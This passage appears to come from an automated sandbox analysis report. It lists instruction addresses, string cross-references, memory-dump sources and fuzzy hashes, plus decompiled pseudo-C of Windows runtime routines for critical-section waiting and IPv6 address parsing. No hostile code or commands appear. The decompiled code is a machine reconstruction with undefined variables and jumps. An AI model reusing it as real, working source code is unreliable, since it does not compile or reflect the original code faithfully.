                                                                                                                                                                                                          0x021123a2
                                                                                                                                                                                                          0x021123a3
                                                                                                                                                                                                          0x021123a6
                                                                                                                                                                                                          0x021123ab
                                                                                                                                                                                                          0x021123ad
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021123b3
                                                                                                                                                                                                          0x021123b3
                                                                                                                                                                                                          0x021123b4
                                                                                                                                                                                                          0x021123b9
                                                                                                                                                                                                          0x021123ba
                                                                                                                                                                                                          0x021123ba
                                                                                                                                                                                                          0x021123bc
                                                                                                                                                                                                          0x021123bf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02109153
                                                                                                                                                                                                          0x02109158
                                                                                                                                                                                                          0x0210915a
                                                                                                                                                                                                          0x0210915e
                                                                                                                                                                                                          0x02109160
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02109166
                                                                                                                                                                                                          0x02109166
                                                                                                                                                                                                          0x02109171
                                                                                                                                                                                                          0x02109176
                                                                                                                                                                                                          0x02109176
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02109160
                                                                                                                                                                                                          0x021123c6
                                                                                                                                                                                                          0x021123cb
                                                                                                                                                                                                          0x021123ce
                                                                                                                                                                                                          0x021123d7
                                                                                                                                                                                                          0x021123d7
                                                                                                                                                                                                          0x021123ad
                                                                                                                                                                                                          0x02112390
                                                                                                                                                                                                          0x02112373
                                                                                                                                                                                                          0x0211233f
                                                                                                                                                                                                          0x0211233f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211233f
                                                                                                                                                                                                          0x02112291
                                                                                                                                                                                                          0x02112291
                                                                                                                                                                                                          0x02112293
                                                                                                                                                                                                          0x02112295
                                                                                                                                                                                                          0x0211229a
                                                                                                                                                                                                          0x021122a1
                                                                                                                                                                                                          0x021122a3
                                                                                                                                                                                                          0x021122a7
                                                                                                                                                                                                          0x021122a9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x021122ab
                                                                                                                                                                                                          0x021122ad
                                                                                                                                                                                                          0x021122af
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021122F4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 021122FC
                                                                                                                                                                                                          • RTL: Resource at %p, xrefs: 0211230B
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 02112328
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                          • API String ID: 885266447-871070163
                                                                                                                                                                                                          • Opcode ID: 1f2f194b370980d11dd94a55348ed10d74dcbcd5251b638d7b407212637080ab
                                                                                                                                                                                                          • Instruction ID: e5d503eeaff2d5d2c48a5febbbce7a3080bdf8ba6336ffb9e1787967dded85a5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f2f194b370980d11dd94a55348ed10d74dcbcd5251b638d7b407212637080ab
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 235108716417126BEB15DB28CCC0FE77799EF48324F104229FD15DB680EB71E8419BA0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                          			E020DEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                          				intOrPtr* _v28;
                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                          				short _v66;
                                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				intOrPtr _t38;
                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                          				intOrPtr _t42;
                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                          				signed int _t44;
                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                          				intOrPtr _t48;
                                                                                                                                                                                                          				signed int _t49;
                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                          				intOrPtr _t53;
                                                                                                                                                                                                          				signed char _t67;
                                                                                                                                                                                                          				void* _t72;
                                                                                                                                                                                                          				intOrPtr _t77;
                                                                                                                                                                                                          				intOrPtr* _t80;
                                                                                                                                                                                                          				intOrPtr _t84;
                                                                                                                                                                                                          				intOrPtr* _t85;
                                                                                                                                                                                                          				void* _t91;
                                                                                                                                                                                                          				void* _t92;
                                                                                                                                                                                                          				void* _t93;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t80 = __edi;
                                                                                                                                                                                                          				_t75 = __edx;
                                                                                                                                                                                                          				_t70 = __ecx;
                                                                                                                                                                                                          				_t84 = _a4;
                                                                                                                                                                                                          				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                                                                          					E020CDA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                                                                          					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                          				__eflags = _t38 - 0xffffffff;
                                                                                                                                                                                                          				if(_t38 == 0xffffffff) {
                                                                                                                                                                                                          					_t39 =  *0x219793c; // 0x0
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(_t84);
                                                                                                                                                                                                          					_t40 = E020B16C0(_t39);
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t40 = E020AF9D4(_t38);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_pop(_t85);
                                                                                                                                                                                                          				__eflags = _t40;
                                                                                                                                                                                                          				if(__eflags < 0) {
                                                                                                                                                                                                          					_push(_t40);
                                                                                                                                                                                                          					E020F3915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                                                                          					asm("int3");
                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                          						L21:
                                                                                                                                                                                                          						_t76 =  *[fs:0x18];
                                                                                                                                                                                                          						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                                                                          						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                                                                          						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                                                                          							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                                                                          							_v66 = 0x1722;
                                                                                                                                                                                                          							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                                          							_t76 =  &_v72;
                                                                                                                                                                                                          							_push( &_v72);
                                                                                                                                                                                                          							_v28 = _t85;
                                                                                                                                                                                                          							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                                                                          							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                                          							_push(0x10);
                                                                                                                                                                                                          							_push(0x20402);
                                                                                                                                                                                                          							E020B01A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                          							_t43 = _v8;
                                                                                                                                                                                                          							_push(_t80);
                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                          							__eflags = _t43 - 0xffffffff;
                                                                                                                                                                                                          							if(_t43 == 0xffffffff) {
                                                                                                                                                                                                          								_t71 =  *0x219793c; // 0x0
                                                                                                                                                                                                          								_push(_t85);
                                                                                                                                                                                                          								_t44 = E020B1F28(_t71);
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t44 = E020AF8CC(_t43);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t44 - 0x102;
                                                                                                                                                                                                          							if(_t44 != 0x102) {
                                                                                                                                                                                                          								__eflags = _t44;
                                                                                                                                                                                                          								if(__eflags < 0) {
                                                                                                                                                                                                          									_push(_t44);
                                                                                                                                                                                                          									E020F3915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                                                                          									asm("int3");
                                                                                                                                                                                                          									E02132306(_t85);
                                                                                                                                                                                                          									__eflags = _t67 & 0x00000002;
                                                                                                                                                                                                          									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                                                                          										_t7 = _t67 + 2; // 0x4
                                                                                                                                                                                                          										_t72 = _t7;
                                                                                                                                                                                                          										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                                                                          										__eflags = _t67 - _t67;
                                                                                                                                                                                                          										if(_t67 == _t67) {
                                                                                                                                                                                                          											E020DEC56(_t72, _t76, _t80, _t85);
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									return 0;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									__eflags = _v24;
                                                                                                                                                                                                          									if(_v24 != 0) {
                                                                                                                                                                                                          										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									return 2;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L36;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                                                                          							_push(_t67);
                                                                                                                                                                                                          							_t46 = E020F4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                                                                          							_push(_t77);
                                                                                                                                                                                                          							E02103F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                                                                          							_t48 =  *_t85;
                                                                                                                                                                                                          							_t92 = _t91 + 0x18;
                                                                                                                                                                                                          							__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                          							if(_t48 == 0xffffffff) {
                                                                                                                                                                                                          								_t49 = 0;
                                                                                                                                                                                                          								__eflags = 0;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                                          							_push(_t49);
                                                                                                                                                                                                          							_t50 = _v12;
                                                                                                                                                                                                          							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                                                                          							_push(_t85);
                                                                                                                                                                                                          							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                                                                          							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                                                                          							E02103F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                                                                          							_t53 =  *_t85;
                                                                                                                                                                                                          							_t93 = _t92 + 0x20;
                                                                                                                                                                                                          							_t67 = _t67 + 1;
                                                                                                                                                                                                          							__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                          							if(_t53 != 0xffffffff) {
                                                                                                                                                                                                          								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                                                                          								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t67 - 2;
                                                                                                                                                                                                          							if(_t67 > 2) {
                                                                                                                                                                                                          								__eflags = _t85 - 0x21920c0;
                                                                                                                                                                                                          								if(_t85 != 0x21920c0) {
                                                                                                                                                                                                          									_t76 = _a4;
                                                                                                                                                                                                          									__eflags = _a4 - _a8;
                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                          										E0213217A(_t71, __eflags, _t85);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_push("RTL: Re-Waiting\n");
                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                          							_push(0x65);
                                                                                                                                                                                                          							_a8 = _a4;
                                                                                                                                                                                                          							E02103F92();
                                                                                                                                                                                                          							_t91 = _t93 + 0xc;
                                                                                                                                                                                                          							__eflags =  *0x7ffe0382;
                                                                                                                                                                                                          							if( *0x7ffe0382 != 0) {
                                                                                                                                                                                                          								goto L21;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L36;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					return _t40;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L36:
                                                                                                                                                                                                          			}

































                                                                                                                                                                                                          0x020debc5
                                                                                                                                                                                                          0x020dec9a
                                                                                                                                                                                                          0x020dec9a
                                                                                                                                                                                                          0x020debd6
                                                                                                                                                                                                          0x020debd6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020debbb
                                                                                                                                                                                                          0x02112477
                                                                                                                                                                                                          0x0211247c
                                                                                                                                                                                                          0x02112486
                                                                                                                                                                                                          0x0211248b
                                                                                                                                                                                                          0x02112496
                                                                                                                                                                                                          0x0211249b
                                                                                                                                                                                                          0x0211249d
                                                                                                                                                                                                          0x021124a0
                                                                                                                                                                                                          0x021124a3
                                                                                                                                                                                                          0x021124aa
                                                                                                                                                                                                          0x021124aa
                                                                                                                                                                                                          0x021124a5
                                                                                                                                                                                                          0x021124a5
                                                                                                                                                                                                          0x021124a5
                                                                                                                                                                                                          0x021124ac
                                                                                                                                                                                                          0x021124af
                                                                                                                                                                                                          0x021124b0
                                                                                                                                                                                                          0x021124b3
                                                                                                                                                                                                          0x021124b9
                                                                                                                                                                                                          0x021124ba
                                                                                                                                                                                                          0x021124bb
                                                                                                                                                                                                          0x021124c6
                                                                                                                                                                                                          0x021124cb
                                                                                                                                                                                                          0x021124cd
                                                                                                                                                                                                          0x021124d0
                                                                                                                                                                                                          0x021124d1
                                                                                                                                                                                                          0x021124d4
                                                                                                                                                                                                          0x021124d6
                                                                                                                                                                                                          0x021124d9
                                                                                                                                                                                                          0x021124d9
                                                                                                                                                                                                          0x021124dc
                                                                                                                                                                                                          0x021124df
                                                                                                                                                                                                          0x021124e1
                                                                                                                                                                                                          0x021124e7
                                                                                                                                                                                                          0x021124e9
                                                                                                                                                                                                          0x021124ec
                                                                                                                                                                                                          0x021124ef
                                                                                                                                                                                                          0x021124f2
                                                                                                                                                                                                          0x021124f2
                                                                                                                                                                                                          0x021124ef
                                                                                                                                                                                                          0x021124e7
                                                                                                                                                                                                          0x021124fa
                                                                                                                                                                                                          0x021124ff
                                                                                                                                                                                                          0x02112501
                                                                                                                                                                                                          0x02112503
                                                                                                                                                                                                          0x02112506
                                                                                                                                                                                                          0x0211250b
                                                                                                                                                                                                          0x020deb8c
                                                                                                                                                                                                          0x020deb93
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020deb93
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020deb99
                                                                                                                                                                                                          0x020dec85
                                                                                                                                                                                                          0x020dec85
                                                                                                                                                                                                          0x020dec85
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0211248D
                                                                                                                                                                                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 021124BD
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 021124FA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                                                                          • API String ID: 0-3177188983
                                                                                                                                                                                                          • Opcode ID: 0fcceab1695c2fd2acbcf40e103df6bddd3f48d671057ae72225ab7657853774
                                                                                                                                                                                                          • Instruction ID: cc5c3fb0341172c0ad6620dfacc2f767621e59453ecf592d90c3eb90ae6dec62
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fcceab1695c2fd2acbcf40e103df6bddd3f48d671057ae72225ab7657853774
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9941D570640314AFD724DB68CC89FAB77BAEF44320F208A15FA699B6C1D734E941DB61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E020EFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                          				signed int _t105;
                                                                                                                                                                                                          				void* _t110;
                                                                                                                                                                                                          				char _t114;
                                                                                                                                                                                                          				short _t115;
                                                                                                                                                                                                          				void* _t118;
                                                                                                                                                                                                          				signed short* _t119;
                                                                                                                                                                                                          				short _t120;
                                                                                                                                                                                                          				char _t122;
                                                                                                                                                                                                          				void* _t127;
                                                                                                                                                                                                          				void* _t130;
                                                                                                                                                                                                          				signed int _t136;
                                                                                                                                                                                                          				intOrPtr _t143;
                                                                                                                                                                                                          				signed int _t158;
                                                                                                                                                                                                          				signed short* _t164;
                                                                                                                                                                                                          				signed int _t167;
                                                                                                                                                                                                          				void* _t170;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t158 = 0;
                                                                                                                                                                                                          				_t164 = _a4;
                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                                                          				_t136 = 0;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                                                                          					if(_t167 == _t158) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t118 = _v20 - _t158;
                                                                                                                                                                                                          					if(_t118 == 0) {
                                                                                                                                                                                                          						if(_t167 == 0x3a) {
                                                                                                                                                                                                          							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                                                                          								break;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t119 =  &(_t164[1]);
                                                                                                                                                                                                          								if( *_t119 != _t167) {
                                                                                                                                                                                                          									break;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t143 = 2;
                                                                                                                                                                                                          								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                                                                          								_v28 = 1;
                                                                                                                                                                                                          								_v8 = _t143;
                                                                                                                                                                                                          								_t136 = _t136 + 1;
                                                                                                                                                                                                          								L47:
                                                                                                                                                                                                          								_t164 = _t119;
                                                                                                                                                                                                          								_v20 = _t143;
                                                                                                                                                                                                          								L14:
                                                                                                                                                                                                          								if(_v24 == _t158) {
                                                                                                                                                                                                          									L19:
                                                                                                                                                                                                          									_t164 =  &(_t164[1]);
                                                                                                                                                                                                          									_t158 = 0;
                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(_v12 == _t158) {
                                                                                                                                                                                                          									if(_v16 > 4) {
                                                                                                                                                                                                          										L29:
                                                                                                                                                                                                          										return 0xc000000d;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t120 = E020EEE02(_v24, _t158, 0x10);
                                                                                                                                                                                                          									_t170 = _t170 + 0xc;
                                                                                                                                                                                                          									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                                                                          									_t136 = _t136 + 1;
                                                                                                                                                                                                          									goto L19;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(_v16 > 3) {
                                                                                                                                                                                                          									goto L29;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t122 = E020EEE02(_v24, _t158, 0xa);
                                                                                                                                                                                                          								_t170 = _t170 + 0xc;
                                                                                                                                                                                                          								if(_t122 > 0xff) {
                                                                                                                                                                                                          									goto L29;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                                                                          								goto L19;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L21:
                                                                                                                                                                                                          						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                                                                          							break;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							if(E020E685D(_t167, 4) == 0) {
                                                                                                                                                                                                          								if(E020E685D(_t167, 0x80) != 0) {
                                                                                                                                                                                                          									if(_v12 > 0) {
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t127 = 1;
                                                                                                                                                                                                          									_a7 = 1;
                                                                                                                                                                                                          									_v24 = _t164;
                                                                                                                                                                                                          									_v20 = 1;
                                                                                                                                                                                                          									_v16 = 1;
                                                                                                                                                                                                          									L36:
                                                                                                                                                                                                          									if(_v20 == _t127) {
                                                                                                                                                                                                          										goto L19;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t158 = 0;
                                                                                                                                                                                                          									goto L14;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								break;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_a7 = 0;
                                                                                                                                                                                                          							_v24 = _t164;
                                                                                                                                                                                                          							_v20 = 1;
                                                                                                                                                                                                          							_v16 = 1;
                                                                                                                                                                                                          							goto L19;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t130 = _t118 - 1;
                                                                                                                                                                                                          					if(_t130 != 0) {
                                                                                                                                                                                                          						if(_t130 == 1) {
                                                                                                                                                                                                          							goto L21;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t127 = 1;
                                                                                                                                                                                                          						goto L36;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t167 >= 0x80) {
                                                                                                                                                                                                          						L7:
                                                                                                                                                                                                          						if(_t167 == 0x3a) {
                                                                                                                                                                                                          							_t158 = 0;
                                                                                                                                                                                                          							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                                                                          								break;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t119 =  &(_t164[1]);
                                                                                                                                                                                                          								if( *_t119 != _t167) {
                                                                                                                                                                                                          									_v8 = _v8 + 1;
                                                                                                                                                                                                          									L13:
                                                                                                                                                                                                          									_v20 = _t158;
                                                                                                                                                                                                          									goto L14;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(_v28 != 0) {
                                                                                                                                                                                                          									break;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_v28 = _v8 + 1;
                                                                                                                                                                                                          								_t143 = 2;
                                                                                                                                                                                                          								_v8 = _v8 + _t143;
                                                                                                                                                                                                          								goto L47;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                                                                          							break;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_v12 = _v12 + 1;
                                                                                                                                                                                                          							_t158 = 0;
                                                                                                                                                                                                          							goto L13;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(E020E685D(_t167, 4) != 0) {
                                                                                                                                                                                                          						_v16 = _v16 + 1;
                                                                                                                                                                                                          						goto L19;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(E020E685D(_t167, 0x80) != 0) {
                                                                                                                                                                                                          						_v16 = _v16 + 1;
                                                                                                                                                                                                          						if(_v12 > 0) {
                                                                                                                                                                                                          							break;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_a7 = 1;
                                                                                                                                                                                                          						goto L19;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L7;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				 *_a8 = _t164;
                                                                                                                                                                                                          				if(_v12 != 0) {
                                                                                                                                                                                                          					if(_v12 != 3) {
                                                                                                                                                                                                          						goto L29;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_v8 = _v8 + 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                                                                          					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						*((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E020C8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E020BDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E020EEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						*((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E020EEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					*((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                                                                                                                                          0x020efd21
                                                                                                                                                                                                          0x020fa3a1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020fa3a1
                                                                                                                                                                                                          0x020efd36
                                                                                                                                                                                                          0x0210200b
                                                                                                                                                                                                          0x02102012
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02102018
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02102018
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020efd36
                                                                                                                                                                                                          0x020efe0f
                                                                                                                                                                                                          0x020efe16
                                                                                                                                                                                                          0x020fa3ad
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020fa3b3
                                                                                                                                                                                                          0x020fa3b3
                                                                                                                                                                                                          0x020efe1f
                                                                                                                                                                                                          0x0211ed25
                                                                                                                                                                                                          0x0211ed86
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ed91
                                                                                                                                                                                                          0x0211ed95
                                                                                                                                                                                                          0x0211ed95
                                                                                                                                                                                                          0x0211ed9a
                                                                                                                                                                                                          0x0211edad
                                                                                                                                                                                                          0x0211edb3
                                                                                                                                                                                                          0x0211edba
                                                                                                                                                                                                          0x0211edc4
                                                                                                                                                                                                          0x0211edc9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211edcc
                                                                                                                                                                                                          0x0211ed2a
                                                                                                                                                                                                          0x0211ed55
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ed61
                                                                                                                                                                                                          0x0211ed66
                                                                                                                                                                                                          0x0211ed6e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211ed7d
